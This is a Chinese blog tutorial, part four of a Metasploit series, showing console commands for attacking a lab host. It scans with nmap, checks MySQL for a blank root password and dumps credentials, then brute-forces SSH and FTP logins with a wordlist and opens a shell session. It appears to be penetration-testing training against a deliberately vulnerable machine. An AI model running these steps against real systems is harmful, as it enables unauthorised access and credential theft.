Metasploit攻击实例(四)

共计2642字 阅读大约9分钟 2270

1.1 Metasploit攻击实例

图片[1]|Metasploit攻击实例(四)|leon的博客

1.1.1 攻击空密码的mysql服务

1.1.1.1 扫描主机并导入metasploit

# nmap -A -T4 -v 192.168.1.120 -oX /tmp/192.168.1.120.xml
msf6 > db_import /tmp/192.168.1.120.xml
msf6 > hosts -R 192.168.1.120

图片[2]|Metasploit攻击实例(四)|leon的博客

msf6 > services -R 192.168.1.120

图片[3]|Metasploit攻击实例(四)|leon的博客

1.1.1.2 验证主机是否存在mysql空密码漏洞

msf6 > search mysql type:auxiliary

图片[4]|Metasploit攻击实例(四)|leon的博客

msf6 > use auxiliary/scanner/mysql/mysql_login
msf6 auxiliary(scanner/mysql/mysql_login) > show options

图片[5]|Metasploit攻击实例(四)|leon的博客

msf6 auxiliary(scanner/mysql/mysql_login) > set USERNAME root
USERNAME => root
msf6 auxiliary(scanner/mysql/mysql_login) > set BLANK_PASSWORDS true
BLANK_PASSWORDS => true
msf6 auxiliary(scanner/mysql/mysql_login) > set RHOSTS 192.168.1.120
RHOSTS => 192.168.1.120
msf6 auxiliary(scanner/mysql/mysql_login) > run

图片[6]|Metasploit攻击实例(四)|leon的博客

1.1.1.3 获取数据库中所有凭证

msf6 auxiliary(scanner/mysql/mysql_login) > creds

图片[7]|Metasploit攻击实例(四)|leon的博客

1.1.1.4 导出扫描结果给其他metasploit使用

msf6 auxiliary(scanner/mysql/mysql_login) > db_export -f xml /tmp/192.168.1.120-mysql.xml
[*] Starting export of workspace default to /tmp/192.168.1.120-mysql.xml [ xml ]...
[*] Finished export of workspace default to /tmp/192.168.1.120-mysql.xml [ xml ]...

1.1.2 暴力破解SSH

1.1.2.1 对ssh进行暴力破解

msf6 > search ssh_login

图片[8]|Metasploit攻击实例(四)|leon的博客

msf6 > use 0
msf6 auxiliary(scanner/ssh/ssh_login) > show options

图片[9]|Metasploit攻击实例(四)|leon的博客

msf6 auxiliary(scanner/ssh/ssh_login) > set RHOSTS 192.168.1.120
RHOSTS => 192.168.1.120
msf6 auxiliary(scanner/ssh/ssh_login) > set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
USERPASS_FILE => /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
msf6 auxiliary(scanner/ssh/ssh_login) > set STOP_ON_SUCCESS true
STOP_ON_SUCCESS => true
msf6 auxiliary(scanner/ssh/ssh_login) > exploit

图片[10]|Metasploit攻击实例(四)|leon的博客

1.1.2.2 破解后进行验证

msf6 auxiliary(scanner/ssh/ssh_login) > sessions

图片[11]|Metasploit攻击实例(四)|leon的博客

msf6 auxiliary(scanner/ssh/ssh_login) > sessions -i 8
[*] Starting interaction with 8...

whoami
msfadmin
ls
vulnerable
background

Background session 9? [y/N]  y

1.1.3 暴力破解FTP

1.1.3.1 对ftp进行暴力破解

msf6 > search ftp_login

图片[12]|Metasploit攻击实例(四)|leon的博客

msf6 > use 0
msf6 auxiliary(scanner/ftp/ftp_login) > show options

图片[13]|Metasploit攻击实例(四)|leon的博客

msf6 auxiliary(scanner/ftp/ftp_login) > set RHOSTS 192.168.1.120
RHOSTS => 192.168.1.120
msf6 auxiliary(scanner/ftp/ftp_login) > set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
USERPASS_FILE => /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
msf6 auxiliary(scanner/ftp/ftp_login) > set STOP_ON_SUCCESS true
STOP_ON_SUCCESS => true
msf6 auxiliary(scanner/ftp/ftp_login) > exploit

图片[14]|Metasploit攻击实例(四)|leon的博客

温馨提示:本文最后更新于2022-12-20 20:57:32,已超过494天没有更新。某些文章具有时效性,若文章内容或图片资源有错误或已失效,请联系站长。谢谢!
转载请注明本文链接:https://blog.leonshadow.cn/763482/2965.html
© 版权声明
版权声明
1. 本网站名称:Leon的博客
2. 本站永久网址:https://blog.leonshadow.cn
3. 本网站的文章部分内容可能来源于网络,仅供大家学习与参考,如有侵权,请联系站长QQ632113590进行删除处理。
4. 本站一切资源不代表本站立场,并不代表本站赞同其观点和对其真实性负责。
5. 本站一律禁止以任何方式发布或转载任何违法的相关信息,访客发现请向站长举报
6. 本站资源大多存储在云盘,如发现链接失效,请联系我们我们会第一时间更新。
THE END
kali工具安全工具渗透提权
# 网络安全# 安全工具# metasploit
喜欢就支持一下吧
点赞0 分享
Leon的博客的头像|leon的博客
Snort部署及使用|leon的博客
Snort部署及使用
Snort部署及使用
6年前 4540
HP服务器UEFI安装CentOS7.x后无法引导的问题|leon的博客
HP服务器UEFI安装CentOS7.x后无法引导的问题
HP服务器UEFI安装CentOS7.x后无法引导的问题
6年前 4202
Windows 1909中Windows沙盒和VMWare虚拟机冲突的解决办法|leon的博客
Windows 1909中Windows沙盒和VMWare虚拟机冲突的解决办法
Windows 1909中Windows沙盒和VMWare虚拟机冲突的解决办法
4年前 3981
修复nessus无法导出pdf|leon的博客
修复nessus无法导出pdf
修复nessus无法导出pdf
5年前 3822
自动化部署(kickstart/cobbler)问题总结|leon的博客
自动化部署(kickstart/cobbler)问题总结
自动化部署(kickstart/cobbler)问题总结
7年前 3807
zabbix相关错误及问题总结(五)|leon的博客
zabbix相关错误及问题总结(五)
zabbix相关错误及问题总结(五)
6年前 3232
相关推荐
Snort部署及使用|leon的博客
Snort部署及使用
Snort部署及使用
6年前 4540
修复nessus无法导出pdf|leon的博客
修复nessus无法导出pdf
修复nessus无法导出pdf
5年前 3822
nessus激活码的申请 | 转|leon的博客
nessus激活码的申请 | 转
nessus激活码的申请 | 转
5年前 1576
Metasploit实例-永恒之蓝漏洞(六)|leon的博客
Metasploit实例-永恒之蓝漏洞(六)
Metasploit实例-永恒之蓝漏洞(六)
2年前 1111
浏览器安装hackbar插件|leon的博客
浏览器安装hackbar插件
浏览器安装hackbar插件
2年前 609
暴力破解-hydra(二)|leon的博客
暴力破解-hydra(二)
暴力破解-hydra(二)
2年前 509
开启精彩搜索
用户封面
Leon的博客的头像|leon的博客
最热文章
Snort部署及使用|leon的博客
4540人已阅读
Snort部署及使用
TOP1
HP服务器UEFI安装CentOS7.x后无法引导的问题|leon的博客
HP服务器UEFI安装CentOS7.x后无法引导的问题
6年前4202人已阅读
TOP2
Windows 1909中Windows沙盒和VMWare虚拟机冲突的解决办法|leon的博客
Windows 1909中Windows沙盒和VMWare虚拟机冲突的解决办法
4年前3981人已阅读
TOP3
修复nessus无法导出pdf|leon的博客
修复nessus无法导出pdf
5年前3822人已阅读
TOP4
自动化部署(kickstart/cobbler)问题总结|leon的博客
自动化部署(kickstart/cobbler)问题总结
7年前3807人已阅读
TOP5
zabbix相关错误及问题总结(五)|leon的博客
zabbix相关错误及问题总结(五)
6年前3232人已阅读
TOP6
Centos7中Logstash使用最新版GeoIP并自动更新|leon的博客
Centos7中Logstash使用最新版GeoIP并自动更新
4年前2967人已阅读
TOP7
草根吧论坛部署恢复|leon的博客
草根吧论坛部署恢复
5年前2784人已阅读
TOP8
KVM简单使用|leon的博客
KVM简单使用
7年前2659人已阅读
TOP9
Rancher部署k8s及使用(一)|leon的博客
Rancher部署k8s及使用(一)
5年前2658人已阅读
TOP10
标签云
黑客 (1)高可用 (6)靶场 (4)防火墙 (6)问题汇总 (3)镜像 (2)远程控制卡 (1)负载均衡 (3)读写分离 (1)语言 (1)证书 (1)论坛 (1)蚁剑 (1)虚拟机 (1)虚拟化 (9)草根吧 (1)自动化 (9)腾讯云 (1)网络安全 (47)网络 (1)网盘 (2)编程语言 (3)缓存 (4)经验总结 (1)系统 (1)硬件 (1)破解 (2)监控 (9)病毒 (6)版本控制 (5)激活 (1)漏洞扫描 (6)漏洞 (6) (1)渗透 (3)浏览器 (2)沙盒 (1)框架 (10)木马 (6)服务器硬件 (1)暴力破解 (5)日志 (1)数据库 (31)提权 (2)持久化 (7)批量管理 (9)性能 (6)开发 (25)